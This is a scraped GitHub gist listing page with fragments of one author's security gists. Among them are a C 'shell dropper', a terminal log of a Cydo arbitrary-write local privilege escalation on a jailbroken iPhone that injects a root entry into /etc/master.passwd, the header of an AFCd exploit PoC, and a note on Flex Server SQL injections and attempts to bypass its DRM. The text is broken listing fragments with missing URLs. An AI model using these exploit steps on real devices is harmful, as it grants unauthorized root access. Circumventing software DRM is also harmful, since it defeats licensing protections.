Skip to content

Instantly share code, notes, and snippets.

View nytimes_crossword
1. Get
2. Extract results.mini_puzzle.[*].puzzle_id
3. Then head over to${puzzle_id}.json
4. Parse the data.
PythEch /
Last active Jun 22, 2016 Race Condition LPE

Generic shell dropper:

#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv, char **envp) {
    execl("/bin/sh", "/bin/sh", 0);
    return 0;
PythEch / gist:d181bf1411057e480586
Last active Jun 22, 2016
Cydo Arbitrary Write Local Privilege Escalation
View gist:d181bf1411057e480586
Hakans-iPhone:/var/tmp mobile$ ln -s /etc/master.passwd
Hakans-iPhone:/var/tmp mobile$ mv master.passwd cydia.log
Hakans-iPhone:/var/tmp mobile$ /usr/libexec/cydia/cydo ":0:0::0:0:System Administrator:/var/root:/bin/sh"
thou shalt not pass
Hakans-iPhone:/var/tmp mobile$ su cydo
Hakans-iPhone:/var/tmp root# cat /etc/master.passwd
# User Database
# This file is the authoritative user database.
#! /usr/bin/env python
PoC of AFCd Vulnerability After Pangu Jailbreak
Copyright (C) 2014 PythEch
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PythEch /
Last active Jun 22, 2016
Flex Server Multiple Vulnerabilities


This gist includes multiple SQL injection vulnerabilities I found by accident in a bus while travelling. These vulnerabilities are easy to find and easy to exploit, and critical.


I already have Flex legacy paid but, can't buy Flex 2 because of credit card restrictions. Anyway, I decided to give Flex 2 a shot, downloaded the beta from

For fun, I tried to figure out whether spoofing UDID is possible by patching Flex 2 itself. I already knew you have put so much work into DRM. I'm still unsuccessful at this.